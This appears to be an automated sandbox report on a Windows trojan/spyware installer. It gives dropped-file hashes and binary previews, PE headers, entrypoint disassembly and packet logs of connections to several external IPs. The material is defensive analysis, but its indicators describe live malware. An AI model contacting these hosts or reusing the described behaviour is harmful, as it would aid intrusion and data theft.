                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample file name:u8QPnVhq0N.exe
                                                              Original Sample Name:7de990046a20e6666627273589b014a5.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@10/5@12/10
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HDC Information:
                                                              • Successful, ratio: 75.9% (good quality ratio 69.9%)
                                                              • Quality average: 76%
                                                              • Quality standard deviation: 30.2%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                              • TCP Packets have been reduced to 100
                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              17:51:00API Interceptor659x Sleep call for process: explorer.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASNs

                                                              No context

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Temp\HI4NJ046K

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\cmstp.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):94208
                                                              Entropy (8bit):1.287139506398081
                                                              Encrypted:false
                                                              SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                              MD5:292F98D765C8712910776C89ADDE2311
                                                              SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                              SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                              SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\mcwfy.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):95232
                                                              Entropy (8bit):6.231519588351459
                                                              Encrypted:false
                                                              SSDEEP:1536:opZrDPCXLdr7zQN/GZGLaYeZjtBaKaedCRVLR8dpxekydJrD9iiU71aC4sWBlVmc:oHTCB7Y/GZGPeZxaGCRVLR9kydI7sCU5
                                                              MD5:6CB712E482D150A185F713D75314A75A
                                                              SHA1:0EE7D4AB0D46C6A668AA500470AAFB632F1ACD99
                                                              SHA-256:C5E0F86A68DCBD03B9A506768F86C385C360D3CF67B9CC0B5760F7B3F1D91F48
                                                              SHA-512:042C3B3A24C35686FA11FBF052A8F278C12535B5F90ECDE5319AA86B8F3616A9A00FBE5E86BD644E2101201B994648BCE2B1F6D6E1F4EDA6C8140F93421CD6E1
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.8-?.V~?.V~?.V~t.U.5.V~t.S...V~t.R.+.V~..S...V~..R...V~..U.,.V~t.W.(.V~?.W~@.V~..^.>.V~..T.>.V~Rich?.V~........................PE..L...2'.d...............!.....z....................@.........................................................................<k.......................................^...............................]..@............................................text............................... ..`.rdata...e.......f..................@..@.data...l............j..............@...........................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\nsl6A3E.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):329165
                                                              Entropy (8bit):7.541945169368556
                                                              Encrypted:false
                                                              SSDEEP:6144:WVez7cuIYLUvLfkWAdTEkQUOM1sXFQveBUQZKQldIDMzCu/GZVZxML7L2+P:WKcsCftAdTEarq3BUQZKQfuMzCu/QZOS
                                                              MD5:4ED3CB08EC2E744A786A87B5FEA1AA59
                                                              SHA1:76A5A491D05D504A367C19F0E9669BAA474A8D12
                                                              SHA-256:A3710AFDDF05886219EB7EBA3A85F0AD33EAC1BA6C4BB67F7B389C6CDA15875D
                                                              SHA-512:EEA49222FD83CA261685EB282985906AF43B0020960961CA8141446E432D594BEC294EC2A76747D6B9F834ABCD3218CA5A014A769DBB7F3B8959360E8FD5ECDC
                                                              Malicious:false
                                                              Preview:.A......,........................-.......@.......A..............................................................................H...........................................................................................................................................................G...................j...............................................................................................................................I...........l...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ortnkgsjk.g

                                                              Download File
                                                              Process:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):211209
                                                              Entropy (8bit):7.998782052319318
                                                              Encrypted:true
                                                              SSDEEP:6144:7Vez7cuIYLUvLfkWAdTEkQUOM1sXFQveBUQZKQlu:7KcsCftAdTEarq3BUQZKQI
                                                              MD5:0A629526F8AEC96658786151E6C3EA06
                                                              SHA1:80B71B17469506F4023F5E3C35715A6A130AC4C5
                                                              SHA-256:D61BEA82FCBA68CFBC5E6BBE882D5E373EAA26C0DD4AD9C5626EE13A780AB546
                                                              SHA-512:848E3A46F2EAEF9656ADF2DAFE618C20BDDB19D98836F43065F219A58D14BEBB554A63B7844560CCF0EF2124F6D51AD2A6D71DA8AA0408EF639D6BB4FFF0A2F4
                                                              Malicious:false
                                                              Preview:...^.1s..E...g..0#YI.!.Dg.,$.K.......#>......i..^...&..X..|..,...\1....e.o.5.T`....;...>.Y..m.c.. ..X.}..mV_.6B]D...UQ.H.C......x..?y..`...`...*.8......K.z.x.o.;.}Z~]v.TO..........V.{...-.>i]..4-e......[m^Bx.N..T!.[.E..yVD.q......"$m..0g.y.^\.B-.U.`.1s...QH.....4.Y....;...-........@.#>....u.i..^.z.&..X.5|......\.,.,Mrc?4....w+..'~&lO..5C.Y.*...I...'.5.}a..8/~.UQ.H.C...U<..*m$.xT..eQ...H...^......j.w[m.H7..B..V.m......qW.:..{.8....(.}v........[.^~..,^..u.0.E..yVD......."....0....^\.B-.U.`.1s..QH......MY....;.....K.......#>......i..^...&..X.5|......\.,.,Mrc?4....w+..'~&lO..5C.Y.*...I...'.5.}a..8/~.UQ.H.C...U<..*m$.xT..eQ...H...^......j.w[m.H7..B..V.m..........V.{.d.-..(.}{6.......[.^~..,^.Tu.[.E..yVD......."....0....^\.B-.U.`.1s..QH......MY....;.....K.......#>......i..^...&..X.5|......\.,.,Mrc?4....w+..'~&lO..5C.Y.*...I...'.5.}a..8/~.UQ.H.C...U<..*m$.xT..eQ...H...^......j.w[m.H7..B..V.m..........V.{.d.-..(.}{6.......[.^~..,^.Tu.[.E..yVD.

                                                              C:\Users\user\AppData\Local\Temp\ytljtt.f

                                                              Download File
                                                              Process:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):5854
                                                              Entropy (8bit):7.162377453768944
                                                              Encrypted:false
                                                              SSDEEP:96:Farc6oY3g/DrYujk2XO5oSwYgCP7Yc3NdN6d35O4pTU15Fn9O2PGiMCmbvrfjXC:FarcRXrhX1S9PPN6d3ZpTU15EJLrLXC
                                                              MD5:452A3EE71E9BA72BB78302A46C6D5B12
                                                              SHA1:F86411F3F43C4351EF651B38A1402C63B90DB7AC
                                                              SHA-256:521E94034E7166D401C6831BFEE91A92848BF821EAE75ADBD857F503C3D42BC2
                                                              SHA-512:0BB5A96F91E37AB5B89A02C2B25D449C27D1A1E25EB42D461D4B52AE2FB067FDF288EF7F7A4C43955BD7A3A1B32CC514F1C4DD27DBFBB6FE6C7916763056DFD3
                                                              Malicious:false
                                                              Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.926593256630463
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:u8QPnVhq0N.exe
                                                              File size:299979
                                                              MD5:7de990046a20e6666627273589b014a5
                                                              SHA1:55ebccd35c2329c5816cd0240b0919651ac58321
                                                              SHA256:ebce15ad53b98d7aba7f7544ee947e88f58d696e22ca4bc5d15b2ded37b577ac
                                                              SHA512:850914621b366494bba2a64aef1b3df7c619c7e6bb321a67bc1a1a97bd0182118a1e5648ee48d24449e6341ab7f7989369797114fa521db8c26ccd5eb3386a42
                                                              SSDEEP:6144:PYa6J+5gUNIG+sCfq3V++iY3aub8kFiLGG9qFP2ipkHj3DR7gy7y:PYDghNESPX3ZZq9q1b6DRc
                                                              TLSH:B2542255E6DDC947D8624E306C7FCA25ABE6F9112D740A1B2320AF45B973240E90F3AF
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                              File Icon

                                                              Icon Hash:b2a88c96b2ca6a72

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x403640
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:61259b55b8912888e90f516ca08dc514

                                                              Entrypoint Preview

                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 000003F4h
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              push 00000020h
                                                              pop edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [ebp-14h], ebx
                                                              mov dword ptr [ebp-04h], 0040A230h
                                                              mov dword ptr [ebp-10h], ebx
                                                              call dword ptr [004080C8h]
                                                              mov esi, dword ptr [004080CCh]
                                                              lea eax, dword ptr [ebp-00000140h]
                                                              push eax
                                                              mov dword ptr [ebp-0000012Ch], ebx
                                                              mov dword ptr [ebp-2Ch], ebx
                                                              mov dword ptr [ebp-28h], ebx
                                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                                              call esi
                                                              test eax, eax
                                                              jne 00007F07D0BACB2Ah
                                                              lea eax, dword ptr [ebp-00000140h]
                                                              mov dword ptr [ebp-00000140h], 00000114h
                                                              push eax
                                                              call esi
                                                              mov ax, word ptr [ebp-0000012Ch]
                                                              mov ecx, dword ptr [ebp-00000112h]
                                                              sub ax, 00000053h
                                                              add ecx, FFFFFFD0h
                                                              neg ax
                                                              sbb eax, eax
                                                              mov byte ptr [ebp-26h], 00000004h
                                                              not eax
                                                              and eax, ecx
                                                              mov word ptr [ebp-2Ch], ax
                                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                                              jnc 00007F07D0BACAFAh
                                                              and word ptr [ebp-00000132h], 0000h
                                                              mov eax, dword ptr [ebp-00000134h]
                                                              movzx ecx, byte ptr [ebp-00000138h]
                                                              mov dword ptr [0042A318h], eax
                                                              xor eax, eax
                                                              mov ah, byte ptr [ebp-0000013Ch]
                                                              movzx eax, ax
                                                              or eax, ecx
                                                              xor ecx, ecx
                                                              mov ch, byte ptr [ebp-2Ch]
                                                              movzx ecx, cx
                                                              shl eax, 10h
                                                              or eax, ecx

                                                              Rich Headers

                                                              Programming Language:
                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xce8.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x3b0000xce80xe00False0.42299107142857145data4.232621117991543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                              RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                              RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                              RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                              RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                              RT_VERSION0x3b7580x250dataEnglishUnited States
                                                              RT_MANIFEST0x3b9a80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                              Imports

                                                              DLLImport
                                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 20, 2023 17:51:05.667118073 CET4969880192.168.2.594.176.104.86
                                                              Mar 20, 2023 17:51:05.704344034 CET804969894.176.104.86192.168.2.5
                                                              Mar 20, 2023 17:51:05.704581022 CET4969880192.168.2.594.176.104.86
                                                              Mar 20, 2023 17:51:05.712644100 CET4969880192.168.2.594.176.104.86
                                                              Mar 20, 2023 17:51:05.752857924 CET804969894.176.104.86192.168.2.5
                                                              Mar 20, 2023 17:51:05.980328083 CET804969894.176.104.86192.168.2.5
                                                              Mar 20, 2023 17:51:05.980354071 CET804969894.176.104.86192.168.2.5
                                                              Mar 20, 2023 17:51:05.980566025 CET4969880192.168.2.594.176.104.86
                                                              Mar 20, 2023 17:51:05.980846882 CET4969880192.168.2.594.176.104.86
                                                              Mar 20, 2023 17:51:06.017899036 CET804969894.176.104.86192.168.2.5
                                                              Mar 20, 2023 17:51:11.020831108 CET4969980192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:11.048405886 CET804969978.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:11.048645020 CET4969980192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:11.048825026 CET4969980192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:11.076636076 CET804969978.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:11.076663017 CET804969978.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:11.076689005 CET804969978.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:11.076894999 CET4969980192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:12.550728083 CET4969980192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:13.566399097 CET4970080192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:13.594280005 CET804970078.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:13.594413996 CET4970080192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:13.594569921 CET4970080192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:13.621995926 CET804970078.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:13.622102022 CET804970078.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:13.622251987 CET804970078.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:13.622320890 CET4970080192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:13.628089905 CET4970080192.168.2.578.141.192.145
                                                              Mar 20, 2023 17:51:13.657012939 CET804970078.141.192.145192.168.2.5
                                                              Mar 20, 2023 17:51:18.720860004 CET4970280192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:18.747663975 CET8049702161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:18.747811079 CET4970280192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:18.747998953 CET4970280192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:18.774467945 CET8049702161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:18.775655985 CET8049702161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:18.775684118 CET8049702161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:18.775814056 CET4970280192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:20.257500887 CET4970280192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:21.286931038 CET4970380192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:21.314835072 CET8049703161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:21.315018892 CET4970380192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:21.315146923 CET4970380192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:21.342814922 CET8049703161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:21.343677998 CET8049703161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:21.343713999 CET8049703161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:21.343878984 CET4970380192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:21.344151020 CET4970380192.168.2.5161.97.163.8
                                                              Mar 20, 2023 17:51:21.370907068 CET8049703161.97.163.8192.168.2.5
                                                              Mar 20, 2023 17:51:26.427524090 CET4970480192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:26.446513891 CET804970491.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:26.448134899 CET4970480192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:26.448251963 CET4970480192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:26.468321085 CET804970491.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:26.468364954 CET804970491.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:26.468543053 CET4970480192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:27.964165926 CET4970480192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:28.974808931 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:28.994070053 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:28.994333029 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:28.994477987 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.054166079 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079484940 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079541922 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079590082 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079637051 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079684973 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079731941 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079747915 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.079782963 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079797983 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.079828978 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079874992 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079876900 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.079921007 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.079973936 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.099098921 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.099133015 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.099155903 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.099188089 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.099210978 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.099232912 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.099253893 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.099299908 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.099364996 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.100024939 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:29.102252007 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.102482080 CET4970580192.168.2.591.195.240.94
                                                              Mar 20, 2023 17:51:29.121347904 CET804970591.195.240.94192.168.2.5
                                                              Mar 20, 2023 17:51:34.198955059 CET4970680192.168.2.5213.145.228.111
                                                              Mar 20, 2023 17:51:34.220103979 CET8049706213.145.228.111192.168.2.5
                                                              Mar 20, 2023 17:51:34.220273018 CET4970680192.168.2.5213.145.228.111
                                                              Mar 20, 2023 17:51:34.220527887 CET4970680192.168.2.5213.145.228.111
                                                              Mar 20, 2023 17:51:34.241683006 CET8049706213.145.228.111192.168.2.5
                                                              Mar 20, 2023 17:51:34.411031961 CET8049706213.145.228.111192.168.2.5
                                                              Mar 20, 2023 17:51:34.411067963 CET8049706213.145.228.111192.168.2.5
                                                              Mar 20, 2023 17:51:34.411088943 CET8049706213.145.228.111192.168.2.5
                                                              Mar 20, 2023 17:51:34.411154032 CET4970680192.168.2.5213.145.228.111
                                                              Mar 20, 2023 17:51:34.418124914 CET8049706213.145.228.111192.168.2.5
                                                              Mar 20, 2023 17:51:34.418153048 CET8049706213.145.228.111192.168.2.5
                                                              Mar 20, 2023 17:51:34.418204069 CET4970680192.168.2.5213.145.228.111

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 20, 2023 17:51:05.616214037 CET5029553192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:51:05.659106016 CET53502958.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:51:10.996087074 CET6084153192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:51:11.019247055 CET53608418.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:51:18.648199081 CET6064953192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:51:18.673597097 CET53606498.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:51:26.386713982 CET5144153192.168.2.58.8.8.8
